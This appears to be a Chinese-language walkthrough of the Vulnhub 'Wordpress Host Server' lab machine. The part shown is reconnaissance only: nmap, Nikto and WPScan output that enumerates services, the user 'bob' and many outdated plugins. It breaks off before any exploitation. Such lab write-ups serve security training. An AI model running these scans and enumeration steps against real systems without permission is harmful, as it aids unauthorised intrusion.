Vulnhub之Wordpress Host Server靶机详细测试过程
Wordpress Host Server
作者: jason_huawen
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Wordpresshostserver]
└─$ cat nmap_full_scan
# Nmap 7.92 scan initiated Sun Feb 26 20:33:01 2023 as: nmap -sS -sV -sC -p- -oN nmap_full_scan 192.168.56.201
Nmap scan report for bogon (192.168.56.201)
Host is up (0.00059s latency).
Not shown: 65350 filtered tcp ports (no-response), 182 filtered tcp ports (host-prohibited)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 08:af:4d:3c:91:26:85:2c:30:d1:38:d7:cd:8c:c3:1d (RSA)
| 256 a8:7c:c9:a5:2d:dd:04:d0:e0:25:2a:cd:f7:68:0c:06 (ECDSA)
|_ 256 a2:72:b9:95:7b:55:2e:57:78:26:75:d4:71:69:89:46 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/7.3.14)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.14
|_http-generator: WordPress 5.3.2
|_http-title: Armour Infosec
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/7.3.14)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.14
| ssl-cert: Subject: commonName=armour infosec/organizationName=Armour infosec/stateOrProvinceName=MP/countryName=IN
| Not valid before: 2020-01-30T18:25:03
|_Not valid after: 2021-01-29T18:25:03
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: 400 Bad Request
MAC Address: 08:00:27:06:BE:39 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 26 20:36:41 2023 -- 1 IP address (1 host up) scanned in 220.41 seconds
获得Shell
添加主机名到/etc/hosts文件中:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Wordpresshostserver]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.201 www.armourinfosec.test
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Wordpresshostserver]
└─$ nikto -h https://192.168.56.201
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.201
+ Target Hostname: 192.168.56.201
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=IN/ST=MP/L=indore/O=Armour infosec/OU=IT/CN=armour infosec/emailAddress=info@armourinfosec.com
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=IN/ST=MP/L=indore/O=Armour infosec/OU=IT/CN=armour infosec/emailAddress=info@armourinfosec.com
+ Start Time: 2023-02-26 22:34:29 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.14
+ Retrieved x-powered-by header: PHP/7.3.14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with multiple values: (<https://www.armourinfosec.test/index.php?rest_route=/>; rel="https://api.w.org/",<https://www.armourinfosec.test/>; rel=shortlink,)
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the secure flag
+ Cookie PHPSESSID created without the httponly flag
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OpenSSL/1.0.2k-fips appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Hostname '192.168.56.201' does not match certificate's names: armour
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 8728 requests: 0 error(s) and 23 item(s) reported on remote host
+ End Time: 2023-02-26 22:37:53 (GMT-5) (204 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (PHP/7.3.14) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
从Nikto工具运行结果得知目标主机运行wordpress站点(https与http似乎内容一致)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Wordpresshostserver]
└─$ wpscan --url https://192.168.56.201 -e u,p --disable-tls-checks
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: https://192.168.56.201/ [192.168.56.201]
[+] Started: Sun Feb 26 22:39:52 2023
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.14
| - X-Powered-By: PHP/7.3.14
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: https://192.168.56.201/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: https://192.168.56.201/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: https://192.168.56.201/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
| Found By: Emoji Settings (Passive Detection)
| - https://192.168.56.201/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.2'
| Confirmed By: Meta Generator (Passive Detection)
| - https://192.168.56.201/, Match: 'WordPress 5.3.2'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:16 <================================================> (10 / 10) 100.00% Time: 00:00:16
[i] User(s) Identified:
[+] bob
| Found By: Author Id Brute Forcing - Display Name (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Feb 26 22:40:34 2023
[+] Requests Done: 47
[+] Cached Requests: 4
[+] Data Sent: 12.477 KB
[+] Data Received: 222.822 KB
[+] Memory used: 208.965 MB
[+] Elapsed time: 00:00:41
但是利用wpscan工具试图破解bob的密码时,运行速度非常的缓慢。因此只能放弃这个方向。看一下有无可利用的插件?
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Wordpresshostserver]
└─$ wpscan --url https://192.168.56.201 --plugins-detection mixed --disable-tls-checks
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: https://192.168.56.201/ [192.168.56.201]
[+] Started: Sun Feb 26 22:43:20 2023
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.14
| - X-Powered-By: PHP/7.3.14
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: https://192.168.56.201/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: https://192.168.56.201/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: https://192.168.56.201/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
| Found By: Emoji Settings (Passive Detection)
| - https://192.168.56.201/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.2'
| Confirmed By: Meta Generator (Passive Detection)
| - https://192.168.56.201/, Match: 'WordPress 5.3.2'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:08:50 <========================================> (101765 / 101765) 100.00% Time: 00:08:50
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] acf-frontend-display
| Location: https://192.168.56.201/wp-content/plugins/acf-frontend-display/
| Readme: https://192.168.56.201/wp-content/plugins/acf-frontend-display/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/acf-frontend-display/, status: 200
|
| Version: 2.0.5 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/acf-frontend-display/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/acf-frontend-display/readme.txt
[+] ad-manager-wd
| Location: https://192.168.56.201/wp-content/plugins/ad-manager-wd/
| Last Updated: 2019-12-18T11:08:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/ad-manager-wd/readme.txt
| [!] The version is out of date, the latest version is 1.0.14
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/ad-manager-wd/, status: 200
|
| Version: 1.0.11 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/ad-manager-wd/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/ad-manager-wd/readme.txt
[+] advanced-video-embed-embed-videos-or-playlists
| Location: https://192.168.56.201/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
| Latest Version: 1.0 (up to date)
| Last Updated: 2015-10-14T13:52:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/, status: 200
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
[+] ajax-load-more
| Location: https://192.168.56.201/wp-content/plugins/ajax-load-more/
| Last Updated: 2023-01-06T14:30:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/ajax-load-more/README.txt
| [!] The version is out of date, the latest version is 5.5.5
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/ajax-load-more/, status: 200
|
| Version: 2.8.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/ajax-load-more/README.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/ajax-load-more/README.txt
[+] akismet
| Location: https://192.168.56.201/wp-content/plugins/akismet/
| Last Updated: 2022-12-01T17:18:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.0.2
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/akismet/, status: 200
|
| Version: 4.1.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/akismet/readme.txt
[+] albo-pretorio-on-line
| Location: https://192.168.56.201/wp-content/plugins/albo-pretorio-on-line/
| Last Updated: 2022-01-26T16:00:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/albo-pretorio-on-line/readme.txt
| [!] The version is out of date, the latest version is 4.5.8
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/albo-pretorio-on-line/, status: 200
|
| Version: 3.2 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/albo-pretorio-on-line/readme.txt
[+] apollo13-framework-extensions
| Location: https://192.168.56.201/wp-content/plugins/apollo13-framework-extensions/
| Last Updated: 2022-05-30T13:17:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/apollo13-framework-extensions/readme.txt
| [!] The version is out of date, the latest version is 1.8.10
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/apollo13-framework-extensions/, status: 200
|
| Version: 1.8.2 (100% confidence)
| Found By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/apollo13-framework-extensions/readme.txt
| Confirmed By: Change Log (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/apollo13-framework-extensions/changelog.txt, Match: '= 1.8.2'
[+] audio-record
| Location: https://192.168.56.201/wp-content/plugins/audio-record/
| Latest Version: 1.0
| Last Updated: 2017-05-10T07:10:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/audio-record/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/audio-record/, status: 200
|
| The version could not be determined.
[+] better-wp-security
| Location: https://192.168.56.201/wp-content/plugins/better-wp-security/
| Last Updated: 2022-12-01T21:32:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/better-wp-security/readme.txt
| [!] The version is out of date, the latest version is 8.1.4
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/better-wp-security/, status: 200
|
| Version: 7.0.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/better-wp-security/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/better-wp-security/readme.txt
[+] classic-editor
| Location: https://192.168.56.201/wp-content/plugins/classic-editor/
| Last Updated: 2022-11-04T19:15:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/classic-editor/readme.txt
| [!] The version is out of date, the latest version is 1.6.2
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/classic-editor/, status: 200
|
| Version: 1.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/classic-editor/readme.txt
[+] cms-tree-page-view
| Location: https://192.168.56.201/wp-content/plugins/cms-tree-page-view/
| Last Updated: 2022-06-30T19:17:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/cms-tree-page-view/readme.txt
| [!] The version is out of date, the latest version is 1.6.6
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/cms-tree-page-view/, status: 500
|
| Version: 1.4 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/cms-tree-page-view/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/cms-tree-page-view/readme.txt
[+] contact-form-builder
| Location: https://192.168.56.201/wp-content/plugins/contact-form-builder/
| Last Updated: 2021-01-12T08:12:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/contact-form-builder/readme.txt
| [!] The version is out of date, the latest version is 1.0.72
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/contact-form-builder/, status: 200
|
| Version: 1.0.67 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/contact-form-builder/readme.txt
[+] duplicator
| Location: https://192.168.56.201/wp-content/plugins/duplicator/
| Last Updated: 2022-12-21T22:01:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/duplicator/readme.txt
| [!] The version is out of date, the latest version is 1.5.1
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/duplicator/, status: 200
|
| Version: 1.2.32 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/duplicator/readme.txt
[+] easy-modal
| Location: https://192.168.56.201/wp-content/plugins/easy-modal/
| Last Updated: 2017-04-13T07:22:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/easy-modal/readme.txt
| [!] The version is out of date, the latest version is 2.1.0
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/easy-modal/, status: 200
|
| Version: 2.0.17 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/easy-modal/readme.txt
[+] elementor
| Location: https://192.168.56.201/wp-content/plugins/elementor/
| Last Updated: 2022-12-21T14:13:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/elementor/readme.txt
| [!] The version is out of date, the latest version is 3.9.2
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/elementor/, status: 200
|
| Version: 2.8.5 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/elementor/readme.txt
| Confirmed By: Javascript Comment (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/elementor/assets/js/admin-feedback.js, Match: 'elementor - v2.8.5'
[+] elisqlreports
| Location: https://192.168.56.201/wp-content/plugins/elisqlreports/
| Last Updated: 2021-09-05T19:45:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/elisqlreports/readme.txt
| [!] The version is out of date, the latest version is 5.21.35
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/elisqlreports/, status: 200
|
| Version: 4.11.33 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/elisqlreports/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/elisqlreports/readme.txt
[+] extra-user-details
| Location: https://192.168.56.201/wp-content/plugins/extra-user-details/
| Last Updated: 2021-02-07T14:12:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/extra-user-details/readme.txt
| [!] The version is out of date, the latest version is 0.5
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/extra-user-details/, status: 200
|
| Version: 0.4.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/extra-user-details/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/extra-user-details/readme.txt
[+] gracemedia-media-player
| Location: https://192.168.56.201/wp-content/plugins/gracemedia-media-player/
| Latest Version: 1.0 (up to date)
| Last Updated: 2013-07-21T15:09:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/gracemedia-media-player/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/gracemedia-media-player/, status: 200
|
| Version: 1.0 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/gracemedia-media-player/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/gracemedia-media-player/readme.txt
[+] gwolle-gb
| Location: https://192.168.56.201/wp-content/plugins/gwolle-gb/
| Last Updated: 2022-11-19T09:57:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/gwolle-gb/readme.txt
| [!] The version is out of date, the latest version is 4.4.1
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/gwolle-gb/, status: 200
|
| Version: 1.5.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/gwolle-gb/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/gwolle-gb/readme.txt
[+] insert-or-embed-articulate-content-into-wordpress
| Location: https://192.168.56.201/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/
| Last Updated: 2022-11-27T22:41:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt
| [!] The version is out of date, the latest version is 4.3000000017
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/, status: 200
|
| Version: 4.2995 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt
[+] joomsport-sports-league-results-management
| Location: https://192.168.56.201/wp-content/plugins/joomsport-sports-league-results-management/
| Last Updated: 2022-11-21T10:18:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/joomsport-sports-league-results-management/readme.txt
| [!] The version is out of date, the latest version is 5.2.8
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/joomsport-sports-league-results-management/, status: 200
|
| Version: 3.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/joomsport-sports-league-results-management/readme.txt
[+] localize-my-post
| Location: https://192.168.56.201/wp-content/plugins/localize-my-post/
| Latest Version: 1.0 (up to date)
| Last Updated: 2016-03-12T04:25:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/localize-my-post/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/localize-my-post/, status: 200
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/localize-my-post/readme.txt
[+] loco-translate
| Location: https://192.168.56.201/wp-content/plugins/loco-translate/
| Last Updated: 2022-10-25T19:56:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/loco-translate/readme.txt
| [!] The version is out of date, the latest version is 2.6.3
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/loco-translate/, status: 200
|
| Version: 2.2.1 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/loco-translate/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/loco-translate/readme.txt
[+] mail-masta
| Location: https://192.168.56.201/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/mail-masta/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/mail-masta/, status: 200
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/mail-masta/readme.txt
[+] photo-gallery
| Location: https://192.168.56.201/wp-content/plugins/photo-gallery/
| Last Updated: 2023-01-05T18:16:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/photo-gallery/readme.txt
| [!] The version is out of date, the latest version is 1.8.9
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/photo-gallery/, status: 200
|
| Version: 1.5.34 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/photo-gallery/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/photo-gallery/readme.txt
[+] rife-elementor-extensions
| Location: https://192.168.56.201/wp-content/plugins/rife-elementor-extensions/
| Last Updated: 2022-05-30T13:14:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/rife-elementor-extensions/readme.txt
| [!] The version is out of date, the latest version is 1.1.10
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/rife-elementor-extensions/, status: 200
|
| Version: 1.1.2 (100% confidence)
| Found By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/rife-elementor-extensions/readme.txt
| Confirmed By: Change Log (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/rife-elementor-extensions/changelog.txt, Match: '= 1.1.2'
[+] searchwp-live-ajax-search
| Location: https://192.168.56.201/wp-content/plugins/searchwp-live-ajax-search/
| Last Updated: 2022-11-21T19:27:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/searchwp-live-ajax-search/readme.txt
| [!] The version is out of date, the latest version is 1.7.3
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/searchwp-live-ajax-search/, status: 200
|
| Version: 1.4.4 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/searchwp-live-ajax-search/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/searchwp-live-ajax-search/readme.txt
[+] site-editor
| Location: https://192.168.56.201/wp-content/plugins/site-editor/
| Latest Version: 1.1.1 (up to date)
| Last Updated: 2017-05-02T23:34:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/site-editor/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/site-editor/, status: 200
|
| Version: 1.1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/site-editor/readme.txt
[+] site-import
| Location: https://192.168.56.201/wp-content/plugins/site-import/
| Last Updated: 2016-03-21T19:52:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/site-import/readme.txt
| [!] The version is out of date, the latest version is 1.2.0
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/site-import/, status: 200
|
| Version: 1.0.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/site-import/readme.txt
[+] smart-google-code-inserter
| Location: https://192.168.56.201/wp-content/plugins/smart-google-code-inserter/
| Last Updated: 2017-11-29T16:28:00.000Z
| Readme: https://192.168.56.201/wp-content/plugins/smart-google-code-inserter/readme.txt
| [!] The version is out of date, the latest version is 3.5
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/smart-google-code-inserter/, status: 200
|
| Version: 3.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://192.168.56.201/wp-content/plugins/smart-google-code-inserter/readme.txt
[+] spider-event-calendar
